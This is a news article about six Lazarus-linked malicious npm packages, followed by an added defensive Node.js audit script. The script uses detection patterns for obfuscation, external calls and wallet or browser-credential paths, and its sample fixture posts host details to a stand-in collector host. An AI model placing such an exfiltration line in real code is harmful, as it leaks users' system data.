Bill Toulas

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Six malicious packages have been identified on npm (Node package manager) linked to the notorious North Korean hacking group Lazarus.

The packages, which have been downloaded 330 times, are designed to steal account credentials, deploy backdoors on compromised systems, and extract sensitive cryptocurrency information.

The threat group is known for pushing malicious packages into software registries like npm, which is used by millions of JavaScript developers, and compromising systems passively.

The packages contain malicious code designed to steal sensitive information, such as cryptocurrency wallets and browser data that contains stored passwords, cookies, and browsing history.

is-buffer-validator – Malicious package mimicking the popular is-buffer library to steal credentials.
yoojae-validator – Fake validation library used to extract sensitive data from infected systems.
array-empty-validator – Fraudulent package designed to collect system and browser credentials.
auth-validator – Mimics authentication validation tools to steal login credentials and API keys.

"The code is designed to collect system environment details, including the hostname, operating system, and system directories," explains the Socket report.

Software developers are advised to double-check the packages they use for their projects and constantly scrutinize code in open-source software to find suspicious signs like obfuscated code and calls to external servers.
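As an added example (not code from the article or from Socket's report), the following Node.js script applies the advice above to a project's dependency list: it flags names that imitate a well-known package, and scans each dependency's installed source for the signs the article names (obfuscation, calls to external servers, host fingerprinting, wallet and browser-profile paths). The reference list of well-known names, the heuristics, and the sample package.json and sources are constructed for illustration.

```javascript
// Reference list of well-known names (constructed; a real audit would use download-ranked registry data).
const POPULAR = ["is-buffer", "lodash", "express"];

// Edit distance, to catch one-character typosquats of a well-known name.
function levenshtein(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return dp[a.length][b.length];
}
// The well-known package a name imitates (bolted-on affix, or one typo away), else null.
function lookalikeOf(name) {
  if (POPULAR.includes(name)) return null;
  for (const p of POPULAR)
    if (name.startsWith(p + "-") || name.endsWith("-" + p) || levenshtein(name, p) <= 1) return p;
  return null;
}
// Source heuristics from the article's advice: obfuscation, calls to external servers,
// host fingerprinting, and wallet / browser-profile paths.
const SUSPICIOUS = [
  { id: "eval", re: /\b(eval|new Function)\s*\(/ },
  { id: "hex-str", re: /(\\x[0-9a-f]{2}){8,}/i },
  { id: "net", re: /\b(https?\.request|fetch|axios\.(get|post))\s*\(\s*['"`]https?:\/\/(?!registry\.npmjs\.org)/ },
  { id: "env-dump", re: /\bos\.(hostname|platform|homedir|userInfo)\(\)/ },
  { id: "wallet", re: /(wallet\.dat|\.keystore|Local Extension Settings|Login Data)/i },
];

function auditSource(src) {
  return SUSPICIOUS.filter((h) => h.re.test(src)).map((h) => h.id);
}
// Walk package.json dependencies; `sources` maps a dependency name to its installed JS text.
function auditDependencies(pkgJson, sources) {
  const findings = [];
  for (const name of Object.keys(pkgJson.dependencies || {})) {
    const base = lookalikeOf(name);
    const hits = auditSource(sources[name] || "");
    if (base || hits.length) findings.push({ name, lookalikeOf: base, hits });
  }
  return findings;
}
// Constructed sample: a typosquat that fingerprints the host and posts it off-site, plus a benign dep.
const samplePkg = { dependencies: { "is-buffer-validator": "1.0.0", lodash: "4.17.21" } };
const sampleSources = {
  "is-buffer-validator": "const os=require('os'),https=require('https');" +
    "https.request('https://collector.invalid/up',{method:'POST'}).end(JSON.stringify({h:os.hostname(),p:os.platform()}));",
  lodash: "module.exports = (arr, n) => arr.slice(0, n);",
};
console.log(JSON.stringify(auditDependencies(samplePkg, sampleSources)));
```

Heuristic hits are leads for manual review, not proof of compromise; a legitimate package can call `os.hostname()` or fetch an external URL for benign reasons.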
This Cyber News was published on www.bleepingcomputer.com. Publication date: Tue, 11 Mar 2025 20:45:20 +0000